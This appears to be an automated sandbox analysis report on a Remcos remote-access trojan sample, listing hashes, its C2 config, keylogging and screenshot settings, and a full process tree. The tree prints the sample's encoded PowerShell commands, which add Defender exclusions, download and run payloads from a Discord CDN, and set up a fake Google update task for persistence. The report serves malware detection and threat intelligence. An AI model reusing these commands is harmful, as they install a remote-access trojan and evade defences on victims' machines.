Analysis
-
max time kernel
150s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
17-10-2022 14:41
Static task
static1
Behavioral task
behavioral1
Sample
5051c71e2b1b319a14474b47876403e4.exe
Resource
win7-20220812-en
General
-
Target
5051c71e2b1b319a14474b47876403e4.exe
-
Size
2.2MB
-
MD5
5051c71e2b1b319a14474b47876403e4
-
SHA1
3684e802d6831d76da44d53cef16939916976b94
-
SHA256
efd4213633c65b490245864feb69279cbdb09add9b70e22e18c183bb0f477cc1
-
SHA512
8aaaa2ed847f452972d36854925e6043fba389f8a8852aad02c10e67d6fc2b0baac5548b48762d522cac4d8980a98170097281fc175f06ff2387c5fdb13b3636
-
SSDEEP
24576:WN9ewmMdH+HY530osWnYQb6VOKs4zm2evT:I
Malware Config
Extracted
remcos
220928
minecraftrpgserver.com:80
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
software_reporter_tool.exe
-
copy_folder
Google
-
delete_file
true
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
adbkey.dat
-
keylog_flag
false
-
keylog_path
%Temp%
-
mouse_option
false
-
mutex
9416a517bdcd8521-8QM7X6
-
screenshot_crypt
true
-
screenshot_flag
true
-
screenshot_folder
Google
-
screenshot_path
%Temp%
-
screenshot_time
60
-
startup_value
Google
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Executes dropped EXE 5 IoCs
Processes:
InstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exepid process 1248 InstallUtil.exe 1748 unzip.exe 808 unzip.exe 1964 unzip.exe 836 unzip.exe -
Loads dropped DLL 2 IoCs
Processes:
InstallUtil.exepid process 988 InstallUtil.exe 988 InstallUtil.exe -
Drops file in System32 directory 4 IoCs
Processes:
unzip.exeunzip.exeunzip.exeunzip.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk unzip.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
5051c71e2b1b319a14474b47876403e4.exedescription pid process target process PID 1944 set thread context of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
5051c71e2b1b319a14474b47876403e4.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exepid process 1944 5051c71e2b1b319a14474b47876403e4.exe 1944 5051c71e2b1b319a14474b47876403e4.exe 1248 InstallUtil.exe 1248 InstallUtil.exe 1964 unzip.exe 808 unzip.exe 1748 unzip.exe 836 unzip.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
5051c71e2b1b319a14474b47876403e4.exeInstallUtil.exeunzip.exeunzip.exeunzip.exeunzip.exedescription pid process Token: SeDebugPrivilege 1944 5051c71e2b1b319a14474b47876403e4.exe Token: SeDebugPrivilege 1248 InstallUtil.exe Token: SeDebugPrivilege 1964 unzip.exe Token: SeDebugPrivilege 836 unzip.exe Token: SeDebugPrivilege 808 unzip.exe Token: SeDebugPrivilege 1748 unzip.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
InstallUtil.exepid process 988 InstallUtil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5051c71e2b1b319a14474b47876403e4.exeInstallUtil.execmd.exeunzip.execmd.execmd.exeunzip.execmd.execmd.exeunzip.exedescription pid process target process PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 1944 wrote to memory of 988 1944 5051c71e2b1b319a14474b47876403e4.exe InstallUtil.exe PID 988 wrote to memory of 1248 988 InstallUtil.exe InstallUtil.exe PID 988 wrote to memory of 1248 988 InstallUtil.exe InstallUtil.exe PID 988 wrote to memory of 1248 988 InstallUtil.exe InstallUtil.exe PID 988 wrote to memory of 1248 988 InstallUtil.exe InstallUtil.exe PID 1648 wrote to memory of 1592 1648 cmd.exe choice.exe PID 1648 wrote to memory of 1592 1648 cmd.exe choice.exe PID 1648 wrote to memory of 1592 1648 cmd.exe choice.exe PID 1748 wrote to memory of 1776 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1776 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1776 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1776 1748 unzip.exe cmd.exe PID 1776 wrote to memory of 336 1776 cmd.exe netsh.exe PID 1776 wrote to memory of 336 1776 cmd.exe netsh.exe PID 1776 wrote to memory of 336 1776 cmd.exe netsh.exe PID 1776 wrote to memory of 336 1776 cmd.exe netsh.exe PID 1748 wrote to memory of 1544 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1544 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1544 1748 unzip.exe cmd.exe PID 1748 wrote to memory of 1544 1748 unzip.exe cmd.exe PID 1544 wrote to memory of 1440 1544 cmd.exe netsh.exe PID 1544 wrote to memory of 1440 1544 cmd.exe netsh.exe PID 1544 wrote to memory of 1440 1544 cmd.exe netsh.exe PID 1544 wrote to memory of 1440 1544 cmd.exe netsh.exe PID 836 wrote to memory of 1592 836 unzip.exe cmd.exe PID 836 wrote to memory of 1592 836 unzip.exe cmd.exe PID 836 wrote to memory of 1592 836 unzip.exe cmd.exe PID 836 wrote to memory of 1592 836 unzip.exe cmd.exe PID 1592 wrote to memory of 1648 1592 cmd.exe schtasks.exe PID 1592 wrote to memory of 1648 1592 cmd.exe schtasks.exe PID 1592 wrote to memory of 1648 1592 cmd.exe schtasks.exe PID 1592 wrote to memory of 1648 1592 cmd.exe schtasks.exe PID 836 wrote to memory of 1196 836 unzip.exe cmd.exe PID 836 wrote to memory of 1196 836 unzip.exe cmd.exe PID 836 wrote to memory of 1196 836 unzip.exe cmd.exe PID 836 wrote to memory of 1196 836 unzip.exe cmd.exe PID 836 wrote to memory of 1148 836 unzip.exe cmd.exe PID 836 wrote to memory of 1148 836 unzip.exe cmd.exe PID 836 wrote to memory of 1148 836 unzip.exe cmd.exe PID 836 wrote to memory of 1148 836 unzip.exe cmd.exe PID 1148 wrote to memory of 1728 1148 cmd.exe attrib.exe PID 1148 wrote to memory of 1728 1148 cmd.exe attrib.exe PID 1148 wrote to memory of 1728 1148 cmd.exe attrib.exe PID 1148 wrote to memory of 1728 1148 cmd.exe attrib.exe PID 1964 wrote to memory of 2012 1964 unzip.exe cmd.exe PID 1964 wrote to memory of 2012 1964 unzip.exe cmd.exe PID 1964 wrote to memory of 2012 1964 unzip.exe cmd.exe PID 1964 wrote to memory of 2012 1964 unzip.exe cmd.exe PID 1964 wrote to memory of 824 1964 unzip.exe cmd.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe"C:\Users\Admin\AppData\Local\Temp\5051c71e2b1b319a14474b47876403e4.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe2⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" cmd.exe /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.8;cmd.exe /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=21⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 set dns name=Local Area Connection static 8.8.8.82⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh interface ipv4 set dns name=Local Area Connection static 8.8.8.83⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c netsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=22⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh interface ipv4 add dns name=Local Area Connection 8.8.4.4 index=23⤵
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAxADQANQAyADQAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcAOAAzADEANAA1ADYAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADMAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AVABoAHIAZQBhAHQASQBEAEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AXwBJAGQAcwAgADIAMQA0ADcANwAzADUANQAwADUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8AQQBjAHQAaQBvAG4AcwAgAEEAbABsAG8AdwAgAC0ARgBvAHIAYwBlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAFQAaAByAGUAYQB0AEkARABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuAF8ASQBkAHMAIAAyADEANAA3ADgAMwAxADQAOQAzACAALQBUAGgAcgBlAGEAdABJAEQARABlAGYAYQB1AGwAdABBAGMAdABpAG8AbgBfAEEAYwB0AGkAbwBuAHMAIABBAGwAbABvAHcAIAAtAEYAbwByAGMAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAnADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcwBvAGYAdAB3AGEAcgBlAF8AcgBlAHAAbwByAHQAZQByAF8AdABvAG8AbAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwASQBOAGUAdABDAGEAYwBoAGUAXABJAEUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAnAHUAbgB6AGkAcAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBjAG0AZAAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBkAHcAbQAuAGUAeABlACcAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFUAcwBlAHIAcwBcACoAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAnAA==1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADYAOAA3ADgAMAA5ADQANQAyADQANQA2ADMANAA5ADYALwA3AHoALgBkAGwAbAAnACwAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGQAbABsACcAKQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAAyADEAOQA0ADkANQA4ADUAMgA0ADIAOQA4ADAAMwA2ADYALwAxADAAMgA2ADgANwA4ADAAOQA0ADgANwAyADYAOQA0ADcAOAA0AC8ANwB6AC4AZQB4AGUAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXAA3AHoALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOQA4ADcANgA3ADcANQA4ADIANQA3ADIAMwA0ADQAMgAvAFUAcABkAGEAdABlAC4AbQBzAGkAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBwAG4AZwAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcADcAegAuAGUAeABlACcAIAB4ACAALQBvAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAHAAbgBnACAALQBwAHgAIAAtAHkAOwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABHAG8AbwBnAGwAZQBcAEkAbgBzAHQAYQBsAGwAVQB0AGkAbAAuAGUAeABlADsAYwBtAGQALgBlAHgAZQAgAC8AYwAgAGMAaABvAGkAYwBlACAALwBjACAAeQAgAC8AbgAgAC8AZAAgAHkAIAAvAHQAIAAzACAAIgAmACIAIABkAGUAbAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwARwBvAG8AZwBsAGUAXABJAG4AcwB0AGEAbABsAFUAdABpAGwALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAzADAAOAA1ADcAMAAwADgAMAAwADMANAAyADAAMgAwADAALwBLAEIANAAwADgANwA2ADQAMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwASwBCADQAMAA4ADcANgA0ADIALgBoAHQAYQAnACkAOwBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYwBoAG8AaQBjAGUAIAAvAGMAIAB5ACAALwBuACAALwBkACAAeQAgAC8AdAAgADMAIAAiACYAIgAgAGQAZQBsACAAIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcAEsAQgA0ADAAOAA3ADYANAAyAC4AaAB0AGEAIgA=1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\ProgramData\Google\7z.exe x -oC:\ProgramData\Google\ C:\ProgramData\Google\InstallUtil.png -px -y2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\ProgramData\Google\InstallUtil.exe2⤵
-
C:\Windows\SysWOW64\choice.exechoice /c y /n /d y /t 33⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c choice /c y /n /d y /t 3 & del C:\Windows\Temp\KB4087642.hta2⤵
-
C:\Windows\SysWOW64\choice.exechoice /c y /n /d y /t 33⤵
-
C:\ProgramData\Google\unzip.exe"C:\ProgramData\Google\unzip.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQAwADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADIAMQA5ADQAOQA1ADgANQAyADQAMgA5ADgAMAAzADYANgAvADEAMAAyADMAOQA0ADkANgAzADUAMQA5ADIAMQAxADEAMQA2ADQALwBjAG0AZAAuAG0AcwBpACcALAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlAFwARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACkAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAMgAxADkANAA5ADUAOAA1ADIANAAyADkAOAAwADMANgA2AC8AMQAwADIAOAA0ADMAOAA4ADIAMAA2ADUANwA1ADYAMQA2ADUAMAAvAHgAbQBsAG8AMgAuAG0AcwBpACcALAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAnACkAOwBjAG0AZAAuAGUAeABlACAALwBjACAAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AeABtAGwAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwALgB4AG0AbAAiACAALwB0AG4AIAAiAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsAIgAgAC8AZgA7AGMAbQBkAC4AZQB4AGUAIAAvAGMAIABkAGUAbAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXAAuAHgAbQBsACIAOwBjAG0AZAAuAGUAeABlACAALwBjACAAYQB0AHQAcgBpAGIAIAArAGgAIAArAFMAIAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAEcAbwBvAGcAbABlACIA1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /xml C:\Windows\Temp\.xml /tn GoogleUpdateTask /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Windows\Temp\.xml2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +h +S C:\ProgramData\Google2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h +S C:\ProgramData\Google3⤵
- Views/modifies file attributes
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y & Del "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\choice.exechoice /c y /n /d y2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\ProgramData\Google\unzip.exeFilesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeFilesize
35KB
MD5e98d234b604ff7176fbef3ad53d0c52a
SHA1ea5afe92242146a39ecdd30c0d5add621ab92e78
SHA25601245c0e4e55638082471bcc3091109cd3bb6ae0665e4f7e17488d54a04fba02
